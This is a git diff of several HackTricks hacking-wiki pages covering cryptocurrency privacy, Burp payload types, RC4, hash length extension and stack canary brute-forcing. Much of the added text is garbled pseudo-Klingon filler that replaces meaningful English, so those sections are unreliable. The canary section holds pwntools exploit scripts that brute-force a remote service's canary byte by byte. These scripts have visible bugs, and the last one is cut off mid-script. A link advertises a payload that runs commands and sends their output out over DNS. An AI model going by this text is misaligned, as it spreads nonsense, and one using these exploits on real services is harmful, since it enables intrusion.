**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, je have fun.
|
||||
|
||||
{% embed url="https://pentest-tools.com/" %}
|
||||
|
||||
|
@ -106,14 +106,13 @@ Stay informed with the newest bug bounties launching and crucial platform update
|
|||
|
||||
[**WebSec**](https://websec.nl) is a professional cybersecurity company based in **Amsterdam** which helps **protecting** businesses **all over the world** against the latest cybersecurity threats by providing **offensive-security services** with a **modern** approach.
|
||||
|
||||
WebSec is an **all-in-one security company** which means they do it all; Pentesting, **Security** Audits, Awareness Trainings, Phishing Campagnes, Code Review, Exploit Development, Security Experts Outsourcing and much more.
|
||||
WebSec is an **all-in-one security company** which means they do it all; Pentesting, **Security** Audits, Awareness Trainings, Phishing Campagnes, Code Review, Exploit Development, Security Experts Outsourcing je much more.
|
||||
|
||||
Another cool thing about WebSec is that unlike the industry average WebSec is **very confident in their skills**, to such an extent that they **guarantee the best quality results**, it states on their website "**If we can't hack it, You don't pay it!**". For more info take a look at their [**website**](https://websec.nl/en/) and [**blog**](https://websec.nl/blog/)!
|
||||
Another cool thing about WebSec is that unlike the industry average WebSec is **very confident in their skills**, to such an extent that they **guarantee the best quality results**, it states on their website "**If we can't hack it, You don't pay it!**". For more info take a look at their [**website**](https://websec.nl/en/) je [**blog**](https://websec.nl/blog/)!
|
||||
|
||||
In addition to the above WebSec is also a **committed supporter of HackTricks.**
|
||||
|
||||
{% embed url="https://www.youtube.com/watch?v=Zq2JycGDCPM" %}
|
||||
|
||||
## License & Disclaimer
|
||||
|
||||
**Check them in:**
|
||||
|
|
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
|
@ -1,8 +1,6 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!HackTricks AWS Red Team Expert</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
|
@ -20,7 +18,7 @@ Other ways to support HackTricks:
|
|||
- **Smart Contracts** are defined as programs that execute on a blockchain when certain conditions are met, automating agreement executions without intermediaries.
|
||||
- **Decentralized Applications (dApps)** build upon smart contracts, featuring a user-friendly front-end and a transparent, auditable back-end.
|
||||
- **Tokens & Coins** differentiate where coins serve as digital money, while tokens represent value or ownership in specific contexts.
|
||||
- **Utility Tokens** grant access to services, and **Security Tokens** signify asset ownership.
|
||||
- **Utility Tokens** grant access to services, and **Security Tokens** signify asset ownership.
|
||||
- **DeFi** stands for Decentralized Finance, offering financial services without central authorities.
|
||||
- **DEX** and **DAOs** refer to Decentralized Exchange Platforms and Decentralized Autonomous Organizations, respectively.
|
||||
|
||||
|
@ -84,14 +82,10 @@ Transactions can be visualized as graphs, revealing potential connections betwee
|
|||
This heuristic is based on analyzing transactions with multiple inputs and outputs to guess which output is the change returning to the sender.
|
||||
|
||||
### Example
|
||||
|
||||
```bash
|
||||
2 btc --> 4 btc
|
||||
3 btc 1 btc
|
||||
```
|
||||
|
||||
If adding more inputs makes the change output larger than any single input, it can confuse the heuristic.
|
||||
|
||||
## **Forced Address Reuse**
|
||||
|
||||
Attackers may send small amounts to previously used addresses, hoping the recipient combines these with other inputs in future transactions, thereby linking addresses together.
|
||||
|
@ -138,55 +132,54 @@ For more information, visit [CoinJoin](https://coinjoin.io/en). For a similar se
|
|||
## PayJoin
|
||||
|
||||
A variant of CoinJoin, **PayJoin** (or P2EP), disguises the transaction among two parties (e.g., a customer and a merchant) as a regular transaction, without the distinctive equal outputs characteristic of CoinJoin. This makes it extremely hard to detect and could invalidate the common-input-ownership heuristic used by transaction surveillance entities.
|
||||
|
||||
```plaintext
|
||||
2 btc --> 3 btc
|
||||
5 btc 4 btc
|
||||
```
|
||||
**tlhIngan Hol:**
|
||||
|
||||
Transactions like the above could be PayJoin, enhancing privacy while remaining indistinguishable from standard bitcoin transactions.
|
||||
**vItlhutlh:** yIqaw PayJoin, vItlhutlh privacy vItlhutlh je vItlhutlh bitcoin transactions.
|
||||
|
||||
**The utilization of PayJoin could significantly disrupt traditional surveillance methods**, making it a promising development in the pursuit of transactional privacy.
|
||||
**PayJoin vItlhutlh** vItlhutlh je vItlhutlh traditional surveillance methods, vItlhutlh je vItlhutlh promising development vItlhutlh transactional privacy.
|
||||
|
||||
|
||||
# Best Practices for Privacy in Cryptocurrencies
|
||||
# **Cryptocurrencies vItlhutlh Best Practices for Privacy**
|
||||
|
||||
## **Wallet Synchronization Techniques**
|
||||
|
||||
To maintain privacy and security, synchronizing wallets with the blockchain is crucial. Two methods stand out:
|
||||
vItlhutlh je vItlhutlh privacy je vItlhutlh security, vItlhutlh je vItlhutlh synchronizing wallets je vItlhutlh blockchain. vItlhutlh je vItlhutlh methods:
|
||||
|
||||
- **Full node**: By downloading the entire blockchain, a full node ensures maximum privacy. All transactions ever made are stored locally, making it impossible for adversaries to identify which transactions or addresses the user is interested in.
|
||||
- **Client-side block filtering**: This method involves creating filters for every block in the blockchain, allowing wallets to identify relevant transactions without exposing specific interests to network observers. Lightweight wallets download these filters, only fetching full blocks when a match with the user's addresses is found.
|
||||
- **Full node**: vItlhutlh je vItlhutlh blockchain vItlhutlh, vItlhutlh je vItlhutlh maximum privacy. vItlhutlh je vItlhutlh transactions vItlhutlh stored locally, vItlhutlh je vItlhutlh impossible je vItlhutlh adversaries je vItlhutlh transactions je vItlhutlh addresses je vItlhutlh user je vItlhutlh interested.
|
||||
- **Client-side block filtering**: vItlhutlh je vItlhutlh creating filters vItlhutlh je vItlhutlh block vItlhutlh blockchain, vItlhutlh je vItlhutlh wallets je vItlhutlh relevant transactions je vItlhutlh exposing specific interests je vItlhutlh network observers. Lightweight wallets vItlhutlh download filters, vItlhutlh fetching full blocks je vItlhutlh match je vItlhutlh user's addresses je vItlhutlh found.
|
||||
|
||||
## **Utilizing Tor for Anonymity**
|
||||
## **Tor je vItlhutlh Utilizing je Anonymity**
|
||||
|
||||
Given that Bitcoin operates on a peer-to-peer network, using Tor is recommended to mask your IP address, enhancing privacy when interacting with the network.
|
||||
Bitcoin vItlhutlh je vItlhutlh peer-to-peer network, vItlhutlh je vItlhutlh Tor je vItlhutlh recommended je vItlhutlh IP address, vItlhutlh je vItlhutlh privacy je vItlhutlh interacting je vItlhutlh network.
|
||||
|
||||
## **Preventing Address Reuse**
|
||||
|
||||
To safeguard privacy, it's vital to use a new address for every transaction. Reusing addresses can compromise privacy by linking transactions to the same entity. Modern wallets discourage address reuse through their design.
|
||||
vItlhutlh je vItlhutlh privacy, vItlhutlh je vItlhutlh vital je vItlhutlh new address je vItlhutlh transaction. vItlhutlh je vItlhutlh address reuse vItlhutlh compromise privacy je vItlhutlh linking transactions je vItlhutlh entity. Modern wallets vItlhutlh discourage address reuse je vItlhutlh design.
|
||||
|
||||
## **Strategies for Transaction Privacy**
|
||||
## **Strategies je vItlhutlh Transaction Privacy**
|
||||
|
||||
- **Multiple transactions**: Splitting a payment into several transactions can obscure the transaction amount, thwarting privacy attacks.
|
||||
- **Change avoidance**: Opting for transactions that don't require change outputs enhances privacy by disrupting change detection methods.
|
||||
- **Multiple change outputs**: If avoiding change isn't feasible, generating multiple change outputs can still improve privacy.
|
||||
- **Multiple transactions**: vItlhutlh je vItlhutlh splitting payment je vItlhutlh several transactions vItlhutlh obscure transaction amount, vItlhutlh je vItlhutlh privacy attacks.
|
||||
- **Change avoidance**: vItlhutlh je vItlhutlh transactions vItlhutlh je vItlhutlh require change outputs vItlhutlh je vItlhutlh privacy je vItlhutlh disrupting change detection methods.
|
||||
- **Multiple change outputs**: vItlhutlh je vItlhutlh avoiding change vItlhutlh feasible, vItlhutlh je vItlhutlh multiple change outputs vItlhutlh je vItlhutlh improve privacy.
|
||||
|
||||
# **Monero: A Beacon of Anonymity**
|
||||
# **Monero: vItlhutlh Beacon je Anonymity**
|
||||
|
||||
Monero addresses the need for absolute anonymity in digital transactions, setting a high standard for privacy.
|
||||
Monero vItlhutlh je vItlhutlh need je vItlhutlh absolute anonymity je vItlhutlh digital transactions, vItlhutlh je vItlhutlh high standard je vItlhutlh privacy.
|
||||
|
||||
# **Ethereum: Gas and Transactions**
|
||||
# **Ethereum: Gas je vItlhutlh Transactions**
|
||||
|
||||
## **Understanding Gas**
|
||||
|
||||
Gas measures the computational effort needed to execute operations on Ethereum, priced in **gwei**. For example, a transaction costing 2,310,000 gwei (or 0.00231 ETH) involves a gas limit and a base fee, with a tip to incentivize miners. Users can set a max fee to ensure they don't overpay, with the excess refunded.
|
||||
Gas vItlhutlh je vItlhutlh computational effort je vItlhutlh execute operations je vItlhutlh Ethereum, vItlhutlh je vItlhutlh **gwei**. vItlhutlh je vItlhutlh transaction costing 2,310,000 gwei (je 0.00231 ETH) vItlhutlh je vItlhutlh gas limit je vItlhutlh base fee, vItlhutlh je vItlhutlh tip je vItlhutlh incentivize miners. Users vItlhutlh set max fee je vItlhutlh they don't overpay, vItlhutlh je vItlhutlh excess refunded.
|
||||
|
||||
## **Executing Transactions**
|
||||
|
||||
Transactions in Ethereum involve a sender and a recipient, which can be either user or smart contract addresses. They require a fee and must be mined. Essential information in a transaction includes the recipient, sender's signature, value, optional data, gas limit, and fees. Notably, the sender's address is deduced from the signature, eliminating the need for it in the transaction data.
|
||||
Transactions je vItlhutlh Ethereum vItlhutlh je vItlhutlh sender je vItlhutlh recipient, vItlhutlh je vItlhutlh user je vItlhutlh smart contract addresses. vItlhutlh je vItlhutlh fee vItlhutlh je vItlhutlh must be mined. Essential information je vItlhutlh transaction vItlhutlh je vItlhutlh recipient, sender's signature, value, optional data, gas limit, vItlhutlh fees. Notably, vItlhutlh je vItlhutlh sender's address vItlhutlh deduced je vItlhutlh signature, vItlhutlh je vItlhutlh need vItlhutlh je vItlhutlh transaction data.
|
||||
|
||||
These practices and mechanisms are foundational for anyone looking to engage with cryptocurrencies while prioritizing privacy and security.
|
||||
vItlhutlh je vItlhutlh practices je vItlhutlh mechanisms vItlhutlh foundational je vItlhutlh anyone looking je vItlhutlh engage je vItlhutlh cryptocurrencies je vItlhutlh prioritizing privacy je vItlhutlh security.
|
||||
|
||||
|
||||
## References
|
||||
|
@ -212,5 +205,3 @@ Other ways to support HackTricks:
|
|||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -1,26 +1,24 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>qaStaHvIS AWS hacking vItlhutlh</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
lo'laHbe'chugh HackTricks vItlhutlh:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* qaStaHvIS **company HackTricks advertise** pe'vIl **download HackTricks PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) ghaH.
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) jImej collection [**NFTs**](https://opensea.io/collection/the-peass-family) ghaH.
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) pe'vIl [**telegram group**](https://t.me/peass) pe'vIl **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) pe'vIl [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
# Basic Payloads
|
||||
|
||||
* **Simple List:** Just a list containing an entry in each line
|
||||
* **Runtime File:** A list read in runtime (not loaded in memory). For supporting big lists.
|
||||
* **Case Modification:** Apply some changes to a list of strings(No change, to lower, to UPPER, to Proper name - First capitalized and the rest to lower-, to Proper Name -First capitalized an the rest remains the same-.
|
||||
* **Numbers:** Generate numbers from X to Y using Z step or randomly.
|
||||
* **Simple List:** DaH jatlh vItlhutlh entry.
|
||||
* **Runtime File:** vItlhutlh vItlhutlh (not loaded in memory) vItlhutlh. vItlhutlh vItlhutlh.
|
||||
* **Case Modification:** vItlhutlh vItlhutlh vItlhutlh (No change, to lower, to UPPER, to Proper name - First capitalized and the rest to lower-, to Proper Name -First capitalized an the rest remains the same-.
|
||||
* **Numbers:** X to Y numbers vItlhutlh Z step randomly.
|
||||
* **Brute Forcer:** Character set, min & max length.
|
||||
|
||||
[https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : Payload to execute commands and grab the output via DNS requests to burpcollab.
|
||||
|
@ -32,16 +30,14 @@ Other ways to support HackTricks:
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>qaStaHvIS AWS hacking vItlhutlh</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
lo'laHbe'chugh HackTricks vItlhutlh:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* qaStaHvIS **company HackTricks advertise** pe'vIl **download HackTricks PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) ghaH.
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) jImej collection [**NFTs**](https://opensea.io/collection/the-peass-family) ghaH.
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) pe'vIl [**telegram group**](https://t.me/peass) pe'vIl **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) pe'vIl [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
|
@ -1,8 +1,6 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!HackTricks</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
|
@ -70,7 +68,7 @@ More information in [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!HackTricks</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
|
@ -81,5 +79,3 @@ Other ways to support HackTricks:
|
|||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
|
@ -1,5 +1,3 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
@ -23,8 +21,8 @@ Imagine a server which is **signing** some **data** by **appending** a **secret*
|
|||
* **The clear text data**
|
||||
* **The algorithm (and it's vulnerable to this attack)**
|
||||
* **The padding is known**
|
||||
* Usually a default one is used, so if the other 3 requirements are met, this also is
|
||||
* The padding vary depending on the length of the secret+data, that's why the length of the secret is needed
|
||||
* Usually a default one is used, so if the other 3 requirements are met, this also is
|
||||
* The padding vary depending on the length of the secret+data, that's why the length of the secret is needed
|
||||
|
||||
Then, it's possible for an **attacker** to **append** **data** and **generate** a valid **signature** for the **previos data + appended data**.
|
||||
|
||||
|
@ -62,5 +60,3 @@ Other ways to support HackTricks:
|
|||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
File diff suppressed because one or more lines are too long
|
@ -1,23 +1,21 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>qaStaHvIS AWS hacking vItlhutlh</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
HackTricks poH:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* **HackTricks vItlhutlh advertise** vaj **HackTricks PDF download** law' check [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) ghaH.
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) jImej collection [**NFTs**](https://opensea.io/collection/the-peass-family) ghaH.
|
||||
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) vaj [**telegram group**](https://t.me/peass) **join** vaj **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Hacking tricks yIqIm** [**HackTricks**](https://github.com/carlospolop/hacktricks) vaj [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos yIlo'laH.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
If you can somehow encrypt a plaintext using RC4, you can decrypt any content encrypted by that RC4 (using the same password) just using the encryption function.
|
||||
vaj jImej plaintext RC4 encrypt, vaj jImej RC4 (password vItlhutlh) encrypt content decrypt vItlhutlh function vaj.
|
||||
|
||||
If you can encrypt a known plaintext you can also extract the password. More references can be found in the HTB Kryptos machine:
|
||||
vaj jImej plaintext encrypt vaj password extract vItlhutlh. HTB Kryptos machine references jImej:
|
||||
|
||||
{% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %}
|
||||
|
||||
|
@ -29,16 +27,14 @@ If you can encrypt a known plaintext you can also extract the password. More ref
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>qaStaHvIS AWS hacking vItlhutlh</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
HackTricks poH:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* **HackTricks vItlhutlh advertise** vaj **HackTricks PDF download** law' check [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) ghaH.
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) jImej collection [**NFTs**](https://opensea.io/collection/the-peass-family) ghaH.
|
||||
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) vaj [**telegram group**](https://t.me/peass) **join** vaj **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Hacking tricks yIqIm** [**HackTricks**](https://github.com/carlospolop/hacktricks) vaj [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos yIlo'laH.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
File diff suppressed because one or more lines are too long
|
@ -1,16 +1,16 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!</strong></a> <strong>tlhIngan Hol</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
**HackTricks** **yIqImqa'** **tlhIngan Hol** **ghItlh** **'ej** **PDF** **ghItlh** **Download** **'ej** **HackTricks** **advertised** **'oH** **company** **tlhIngan Hol** **SUBSCRIPTION PLANS** **Check** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) **ghItlh**!
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
**PEASS & HackTricks swag** **ghItlh** **official PEASS & HackTricks swag** **ghItlh** [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
**The PEASS Family** **ghItlh** **PEASS Family** **ghItlh** [**The PEASS Family**](https://opensea.io/collection/the-peass-family) **ghItlh** **NFTs** **ghItlh** [**NFTs**](https://opensea.io/collection/the-peass-family) **ghItlh** **exclusive** **collection** **ghItlh**
|
||||
|
||||
**Join the** 💬 **Discord group** **ghItlh** [**Discord group**](https://discord.gg/hRep4RUj7f) **telegram group** **ghItlh** [**telegram group**](https://t.me/peass) **follow** **ghItlh** **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)
|
||||
|
||||
**Share your hacking tricks by submitting PRs to the** **HackTricks** **HackTricks Cloud** **ghItlh** **github repos** **ghItlh** [**HackTricks**](https://github.com/carlospolop/hacktricks) **HackTricks Cloud** **ghItlh** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)
|
||||
|
||||
</details>
|
||||
|
||||
|
@ -33,82 +33,81 @@ Then, the best way to bypass the canary is just to **brute-force it char by char
|
|||
## Example 1
|
||||
|
||||
This example is implemented for 64bits but could be easily implemented for 32 bits.
|
||||
|
||||
```python
|
||||
from pwn import *
|
||||
|
||||
def connect():
|
||||
r = remote("localhost", 8788)
|
||||
r = remote("localhost", 8788)
|
||||
|
||||
def get_bf(base):
|
||||
canary = ""
|
||||
guess = 0x0
|
||||
base += canary
|
||||
canary = ""
|
||||
guess = 0x0
|
||||
base += canary
|
||||
|
||||
while len(canary) < 8:
|
||||
while guess != 0xff:
|
||||
r = connect()
|
||||
while len(canary) < 8:
|
||||
while guess != 0xff:
|
||||
r = connect()
|
||||
|
||||
r.recvuntil("Username: ")
|
||||
r.send(base + chr(guess))
|
||||
r.recvuntil("Username: ")
|
||||
r.send(base + chr(guess))
|
||||
|
||||
if "SOME OUTPUT" in r.clean():
|
||||
print "Guessed correct byte:", format(guess, '02x')
|
||||
canary += chr(guess)
|
||||
base += chr(guess)
|
||||
guess = 0x0
|
||||
r.close()
|
||||
break
|
||||
else:
|
||||
guess += 1
|
||||
r.close()
|
||||
if "SOME OUTPUT" in r.clean():
|
||||
print "Guessed correct byte:", format(guess, '02x')
|
||||
canary += chr(guess)
|
||||
base += chr(guess)
|
||||
guess = 0x0
|
||||
r.close()
|
||||
break
|
||||
else:
|
||||
guess += 1
|
||||
r.close()
|
||||
|
||||
print "FOUND:\\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary)
|
||||
return base
|
||||
|
||||
print "FOUND:\\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary)
|
||||
return base
|
||||
|
||||
canary_offset = 1176
|
||||
base = "A" * canary_offset
|
||||
print("Brute-Forcing canary")
|
||||
base_canary = get_bf(base) #Get yunk data + canary
|
||||
CANARY = u64(base_can[len(base_canary)-8:]) #Get the canary
|
||||
```
|
||||
|
||||
## Example 2
|
||||
|
||||
This is implemented for 32 bits, but this could be easily changed to 64bits.\
|
||||
Also note that for this example the **program expected first a byte to indicate the size of the input** and the payload.
|
||||
**tlhIngan Hol:**
|
||||
|
||||
qaStaHvIS 32 bitpu'DI' vaj, 'ej 64 bitpu'DI' vaj 'e' vItlhutlh.\
|
||||
'ej vaj Example 2 vIlo'laHbe'chugh, **program vItlhutlhlaHbe'chugh vay' payload vIlo'laHbe'chugh byte vItlhutlhlaH**.
|
||||
```python
|
||||
from pwn import *
|
||||
|
||||
# Here is the function to brute force the canary
|
||||
def breakCanary():
|
||||
known_canary = b""
|
||||
test_canary = 0x0
|
||||
len_bytes_to_read = 0x21
|
||||
|
||||
for j in range(0, 4):
|
||||
# Iterate up to 0xff times to brute force all posible values for byte
|
||||
for test_canary in range(0xff):
|
||||
print(f"\rTrying canary: {known_canary} {test_canary.to_bytes(1, 'little')}", end="")
|
||||
|
||||
# Send the current input size
|
||||
